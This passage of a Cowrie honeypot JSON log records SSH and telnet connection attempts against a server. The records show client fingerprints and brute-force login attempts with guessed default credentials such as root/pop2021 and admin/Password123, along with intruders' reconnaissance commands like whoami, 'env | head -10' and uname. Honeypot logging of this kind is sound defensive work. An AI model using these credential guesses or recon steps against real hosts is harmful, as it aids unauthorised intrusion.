0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:40:54.851346Z","src_ip":"212.227.125.160","session":"0651e21d1082"}
{"eventid":"cowrie.session.closed","duration":13.555529117584229,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:40:56.043197Z","src_ip":"212.227.125.160","session":"97a6c549e429"}
{"eventid":"cowrie.login.success","username":"root","password":"pop2021","message":"login attempt [root/pop2021] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:41:01.077203Z","src_ip":"212.227.125.160","session":"0651e21d1082"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:41:03.919412Z","src_ip":"212.227.125.160","session":"0651e21d1082"}
{"eventid":"cowrie.command.input","input":"whoami","message":"CMD: whoami","sensor":"my-vps","timestamp":"2025-08-28T22:41:03.920274Z","src_ip":"212.227.125.160","session":"0651e21d1082"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","size":5,"shasum":"f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1","duplicate":true,"duration":"1.5","message":"Closing TTY Log: var/lib/cowrie/tty/f25297859cf0a70af5c053a5464a5fa647a35ceee1d91397331903846d79ffc1 after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:41:05.439629Z","src_ip":"212.227.125.160","session":"0651e21d1082"}
{"eventid":"cowrie.session.closed","duration":"12.0","message":"Connection lost after 12.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:41:05.440881Z","src_ip":"212.227.125.160","session":"0651e21d1082"}
{"eventid":"cowrie.session.connect","src_ip":"201.148.180.50","src_port":37352,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b8dc29293a9","protocol":"ssh","message":"New connection: 201.148.180.50:37352 (1.2.3.4:22) [session: 9b8dc29293a9]","sensor":"my-vps","timestamp":"2025-08-28T22:41:12.350980Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53805,"dst_ip":"1.2.3.4","dst_port":23,"session":"2784a63af399","protocol":"telnet","message":"New connection: 212.227.235.229:53805 (1.2.3.4:23) [session: 2784a63af399]","sensor":"my-vps","timestamp":"2025-08-28T22:41:12.811108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:41:13.378170Z","src_ip":"201.148.180.50","session":"9b8dc29293a9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:41:13.379158Z","src_ip":"201.148.180.50","session":"9b8dc29293a9"}
{"eventid":"cowrie.login.success","username":"root","password":"pop2021","message":"login attempt [root/pop2021] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:41:21.622231Z","src_ip":"201.148.180.50","session":"9b8dc29293a9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:41:25.765767Z","src_ip":"201.148.180.50","session":"9b8dc29293a9"}
{"eventid":"cowrie.command.input","input":"env | head -10","message":"CMD: env | head -10","sensor":"my-vps","timestamp":"2025-08-28T22:41:25.766892Z","src_ip":"201.148.180.50","session":"9b8dc29293a9"}
{"eventid":"cowrie.session.closed","duration":13.17194414138794,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:41:25.982997Z","src_ip":"212.227.235.229","session":"2784a63af399"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","size":28,"shasum":"54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/54b13bf37f0f1c6d20bb831acb4d4856be1e90f0be7953c3660ae0d32d775d3b after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:41:27.318558Z","src_ip":"201.148.180.50","session":"9b8dc29293a9"}
{"eventid":"cowrie.session.closed","duration":"15.0","message":"Connection lost after 15.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:41:27.319675Z","src_ip":"201.148.180.50","session":"9b8dc29293a9"}
{"eventid":"cowrie.session.connect","src_ip":"112.164.83.96","src_port":35165,"dst_ip":"1.2.3.4","dst_port":23,"session":"8752caf966ee","protocol":"telnet","message":"New connection: 112.164.83.96:35165 (1.2.3.4:23) [session: 8752caf966ee]","sensor":"my-vps","timestamp":"2025-08-28T22:42:00.989058Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48770,"dst_ip":"1.2.3.4","dst_port":22,"session":"7d29cad42fd3","protocol":"ssh","message":"New connection: 212.227.235.229:48770 (1.2.3.4:22) [session: 7d29cad42fd3]","sensor":"my-vps","timestamp":"2025-08-28T22:42:09.133271Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:42:09.134620Z","src_ip":"212.227.235.229","session":"7d29cad42fd3"}
{"eventid":"cowrie.client.kex","hassh":"f1e5e9d24e5e345e8745613bde22d532","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f1e5e9d24e5e345e8745613bde22d532","sensor":"my-vps","timestamp":"2025-08-28T22:42:09.240406Z","src_ip":"212.227.235.229","session":"7d29cad42fd3"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","sensor":"my-vps","timestamp":"2025-08-28T22:42:09.454606Z","src_ip":"212.227.235.229","session":"7d29cad42fd3"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T22:42:09.455803Z","src_ip":"212.227.235.229","session":"7d29cad42fd3"}
{"eventid":"cowrie.client.fingerprint","username":"root","fingerprint":"24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==","type":"ssh-rsa","message":"public key attempt for user root of type ssh-rsa with fingerprint 24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","sensor":"my-vps","timestamp":"2025-08-28T22:42:09.562581Z","src_ip":"212.227.235.229","session":"7d29cad42fd3"}
{"eventid":"cowrie.login.failed","username":"root","fingerprint":"24:c5:23:02:d5:9a:b0:07:cc:57:ef:91:16:2e:81:35","key":"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQC/yU0iqklqw6etPlUon4mZzxslFWq8G8sRyluQMD3i8tpQWT2cX/mwGgSRCz7HMLyxt87olYIPemTIRBiyqk8SLD3ijQpfZwQ9vsHc47hdTBfj89FeHJGGm1KpWg8lrXeMW+5jIXTFmEFhbJ18wc25Dcds4QCM0DvZGr/Pg4+kqJ0gLyqYmB2fdNzBcU05QhhWW6tSuYcXcyAz8Cp73JmN6TcPuVqHeFYDg05KweYqTqThFFHbdxdqqrWy6fNt8q/cgI30NBa5W2LyZ4b1v6324IEJuxImARIxTc96Igaf30LUza8kbZyc3bewY6IsFUN1PjQJcJi0ubVLyWyyJ554Tv8BBfPdY4jqCr4PzaJ2Rc1JFJYUSVVT4yX2p7L6iRpW212eZmqLMSoR5a2a/tO2s1giIlb+0EHtFWc2QH7yz/ZBjnun7opIoslLVvYJ9cxMoLeLr5Ig+zny+IEA3x090xtcL62X0jea6btVnYo7UN2BARziisZze6oVuOTCBijuyvOM6ROZ6s/wl4CQAOSLDeFIP5L1paP9V1XLaYLDBAodNaUPFfTxggH3tZrnnU8Dge5/1JNa08F3WNUPM1S1x8L2HMatwc82x35jXyBSp3AMbdxMPhvyYI8v2J1PqJH8OqGTVjdWe40mD2osRgLo1EOfP/SFBTD5VEo95K2ZLQ==","type":"ssh-rsa","message":"public key login attempt for [root] failed","sensor":"my-vps","timestamp":"2025-08-28T22:42:09.563233Z","src_ip":"212.227.235.229","session":"7d29cad42fd3"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:42:19.133285Z","src_ip":"212.227.235.229","session":"7d29cad42fd3"}
{"eventid":"cowrie.session.closed","duration":31.350545644760132,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:42:32.339523Z","src_ip":"112.164.83.96","session":"8752caf966ee"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:42:50.063267Z","src_ip":"36.251.194.42","session":"a4bc6c9daf84"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":59360,"dst_ip":"1.2.3.4","dst_port":22,"session":"cc66cb37336d","protocol":"ssh","message":"New connection: 217.72.205.35:59360 (1.2.3.4:22) [session: cc66cb37336d]","sensor":"my-vps","timestamp":"2025-08-28T22:43:17.363766Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:43:17.365050Z","src_ip":"217.72.205.35","session":"cc66cb37336d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45020,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e39c00c3fdc","protocol":"ssh","message":"New connection: 212.227.235.229:45020 (1.2.3.4:22) [session: 9e39c00c3fdc]","sensor":"my-vps","timestamp":"2025-08-28T22:43:22.041795Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:43:22.218360Z","src_ip":"212.227.235.229","session":"9e39c00c3fdc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45032,"dst_ip":"1.2.3.4","dst_port":22,"session":"61162c369df3","protocol":"ssh","message":"New connection: 212.227.235.229:45032 (1.2.3.4:22) [session: 61162c369df3]","sensor":"my-vps","timestamp":"2025-08-28T22:43:22.394604Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:43:22.396727Z","src_ip":"212.227.235.229","session":"61162c369df3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T22:43:22.574980Z","src_ip":"212.227.235.229","session":"61162c369df3"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"password","message":"login attempt [oracle/password] failed","sensor":"my-vps","timestamp":"2025-08-28T22:43:23.663913Z","src_ip":"212.227.235.229","session":"61162c369df3"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:43:24.842648Z","src_ip":"212.227.235.229","session":"61162c369df3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44410,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b73f83a6991","protocol":"ssh","message":"New connection: 212.227.235.229:44410 (1.2.3.4:22) [session: 9b73f83a6991]","sensor":"my-vps","timestamp":"2025-08-28T22:44:08.151295Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T22:44:08.152583Z","src_ip":"212.227.235.229","session":"9b73f83a6991"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T22:44:08.256382Z","src_ip":"212.227.235.229","session":"9b73f83a6991"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa123456","message":"login attempt [root/Aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T22:44:08.573174Z","src_ip":"212.227.235.229","session":"9b73f83a6991"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T22:44:08.799365Z","src_ip":"212.227.235.229","session":"9b73f83a6991"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T22:44:08.800211Z","src_ip":"212.227.235.229","session":"9b73f83a6991"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:44:08.905575Z","src_ip":"212.227.235.229","session":"9b73f83a6991"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:44:08.906789Z","src_ip":"212.227.235.229","session":"9b73f83a6991"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.15","src_port":39726,"dst_ip":"1.2.3.4","dst_port":22,"session":"e712a1bdb0ee","protocol":"ssh","message":"New connection: 80.94.95.15:39726 (1.2.3.4:22) [session: e712a1bdb0ee]","sensor":"my-vps","timestamp":"2025-08-28T22:45:43.379233Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T22:45:43.380147Z","src_ip":"80.94.95.15","session":"e712a1bdb0ee"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T22:45:43.431169Z","src_ip":"80.94.95.15","session":"e712a1bdb0ee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Password123","message":"login attempt [admin/Password123] failed","sensor":"my-vps","timestamp":"2025-08-28T22:45:43.752300Z","src_ip":"80.94.95.15","session":"e712a1bdb0ee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"lab","message":"login attempt [admin/lab] failed","sensor":"my-vps","timestamp":"2025-08-28T22:45:44.805709Z","src_ip":"80.94.95.15","session":"e712a1bdb0ee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"password1","message":"login attempt [admin/password1] failed","sensor":"my-vps","timestamp":"2025-08-28T22:45:45.860324Z","src_ip":"80.94.95.15","session":"e712a1bdb0ee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"0","message":"login attempt [admin/0] failed","sensor":"my-vps","timestamp":"2025-08-28T22:45:46.915437Z","src_ip":"80.94.95.15","session":"e712a1bdb0ee"}
{"eventid":"cowrie.login.failed","username":"admin","password":"8EjTlr35SVMd","message":"login attempt [admin/8EjTlr35SVMd] failed","sensor":"my-vps","timestamp":"2025-08-28T22:45:47.969181Z","src_ip":"80.94.95.15","session":"e712a1bdb0ee"}
{"eventid":"cowrie.session.closed","duration":"5.6","message":"Connection lost after 5.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T22:45:49.025575Z","src_ip":"80.94.95.15","session":"e712a1bdb0ee"}
{"eventid":"cowrie.session.connect","src_ip":"3.149.59.26","src_port":53420,"dst_ip":"1.2.3.4","dst_port":22,"session":"072fe208d683","protocol":"ssh","message":"New connection: 3.149.59.26:53420 (1.2.3.4:22) [session: 072fe208d683]","sensor":"my-vps","timestamp":"2025-08-28T22:46:16.733319Z"}
